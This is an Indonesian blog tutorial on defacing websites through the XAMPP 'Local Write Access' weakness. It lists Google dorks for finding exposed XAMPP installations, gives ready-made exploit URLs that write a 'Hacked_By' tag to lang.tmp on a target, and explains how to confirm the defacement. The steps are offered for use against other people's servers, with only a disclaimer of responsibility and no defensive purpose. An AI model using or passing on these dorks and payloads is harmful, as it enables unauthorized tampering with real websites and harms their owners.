Deface

Deface metode Xampp Local Write Access

Tutorial Deface Xampp Local Write Access

SAZFHI Indonesia – Halo semuanya, di artikel pertama tentang deface ini adalah Tutorial Deface Metode XLWA, min ko pertama harus ngedeface memakai metode Xampp Local Write Access? Itu karena menurut admin tutorial ini mungkin cukup “Gampang” (Menurut Admin :’v). Oke deh gak usah pake lama, langsung aja ke pembahasan utamanya.

Berikut ini Tutorial Deface Xampp Local Write Access.

  1. Hal pertama yang harus kamu lakukan adalah mencari target memakai Dork, berikut dork yang admin tau.
    – inurl:/security/lang.php
    – inurl:/xampp/lang.php
    – inurl:/xampp/splash.php
    – inurl:xampp/index.php intitle:XAMPP
  2. Kamu dorking terlebih dahulu menggunakan salah satu dork yang admin berikan. Disini admin menggunakan dork inurl:/security/lang.php.
  3. Setelah mendapatkan targetnya, kamu masukkin Exploit-nya.
    Exploit :
    – target.com/xampp/lang.php?Hacked_By_SAYSHZ
    – target.com/security/lang.php?Hacked_By_SAYSHZ
    Note: Ganti Nick Admin dengan nick kalian.
  4. Jika defacenya berhasil, maka akan muncul kata kata mutiara :v
  5. Untuk melihat hasil deface kamu, kamu bisa buka urlnya seperti ini
    – target.com/xampp/lang.tmp
    – target.com/security/lang.tmp

Akhir Kata

Nah gimana, Bisa ngak ngedefacenya? Kalo ga bisa berarti websitenya tidak vuln. oh iya admin ingin bilang nih ke kalian…
Admin tidak bertanggung jawab jika terjadi masalah, saya disini hanya membagikan ilmu. So gunakan artikel ini sebaik baiknya.

Tinggalkan Balasan

Alamat email Anda tidak akan dipublikasikan. Ruas yang wajib ditandai *

Back to top button
Close
Close

AdBlock Terdeteksi

Silakan matikan AdBlock anda untuk membaca artikel ini.